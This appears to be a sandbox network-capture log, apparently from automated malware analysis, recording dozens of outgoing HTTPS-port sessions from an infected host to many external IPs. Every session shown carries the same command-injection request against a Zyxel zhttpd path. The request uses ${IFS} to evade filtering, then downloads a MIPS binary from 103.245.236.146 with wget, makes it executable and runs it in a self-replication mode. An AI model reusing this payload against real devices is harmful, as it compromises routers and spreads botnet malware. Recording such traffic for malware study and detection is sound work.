                                                  Jan 19, 2024 18:24:01.168275118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5701192.168.2.1347652114.219.30.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168323040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5702192.168.2.1353472204.219.154.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168374062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5703192.168.2.1333244106.163.245.96443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168394089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5704192.168.2.135977475.176.92.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168442011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5705192.168.2.1350034183.77.82.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168472052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5706192.168.2.135930851.86.188.8443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168529987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5707192.168.2.134612251.157.93.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168560028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5708192.168.2.1347124101.34.29.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168603897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5709192.168.2.133544235.79.66.210443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168653965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5710192.168.2.133701078.179.63.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168693066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5711192.168.2.1337602154.234.105.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168740034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5712192.168.2.1348734171.66.156.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168768883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5713192.168.2.1340198148.153.188.69443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168807983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5714192.168.2.135593827.73.225.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168845892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5715192.168.2.1333100113.55.206.79443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168879032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5716192.168.2.1357142146.71.153.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168898106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5717192.168.2.135336289.114.92.17443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168956041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5718192.168.2.1339996113.20.72.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.168981075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5719192.168.2.1349302207.73.226.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169032097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5720192.168.2.1334796196.201.148.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169064045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5721192.168.2.1353932125.237.105.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169105053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5722192.168.2.13354824.76.44.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169135094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5723192.168.2.135355045.245.74.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169162989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5724192.168.2.1343310128.90.17.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169203043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5725192.168.2.136071471.65.200.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169231892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5726192.168.2.1335096145.202.131.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169270039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5727192.168.2.133555212.226.201.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169321060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5728192.168.2.1360354209.200.63.23443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169338942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5729192.168.2.134041880.55.151.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169384956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5730192.168.2.1356906150.217.130.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169416904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5731192.168.2.13509425.123.249.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169447899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5732192.168.2.134439445.193.38.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169496059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5733192.168.2.135710043.106.1.111443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169517994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5734192.168.2.1340082185.76.4.60443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169545889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5735192.168.2.1346578184.42.120.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169588089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5736192.168.2.1334342103.105.113.204443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169617891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5737192.168.2.1352804147.77.122.135443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169658899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5738192.168.2.135785023.187.201.160443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169675112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5739192.168.2.1337224107.35.81.51443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169703960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5740192.168.2.1336228161.77.114.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169739008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5741192.168.2.1344582145.215.219.138443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169785023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5742192.168.2.1349574125.217.63.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169804096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5743192.168.2.134257643.39.1.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169857025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5744192.168.2.1340396197.42.113.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169883013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5745192.168.2.134313092.189.77.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169923067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5746192.168.2.134725874.48.89.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.169956923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5747192.168.2.1350614183.86.216.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170010090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5748192.168.2.135344848.123.10.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170062065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5749192.168.2.1358466198.169.174.65443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170097113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5750192.168.2.133349080.140.216.40443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170135975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5751192.168.2.1348762219.178.176.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170186996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5752192.168.2.1333224165.3.92.239443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170232058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5753192.168.2.1337708198.118.27.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170262098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5754192.168.2.135982088.183.110.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170299053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5755192.168.2.1360058178.159.21.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170357943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5756192.168.2.1352608160.157.82.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170402050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5757192.168.2.134391244.117.2.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170437098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5758192.168.2.1343386183.150.182.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170468092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5759192.168.2.1349778118.6.240.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170502901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5760192.168.2.1353502130.235.144.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170540094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5761192.168.2.1360330201.235.27.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170564890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5762192.168.2.1352892191.75.97.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:01.170620918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5763192.168.2.1335394189.61.83.185443
                                                  TimestampBytes transferredDirectionData
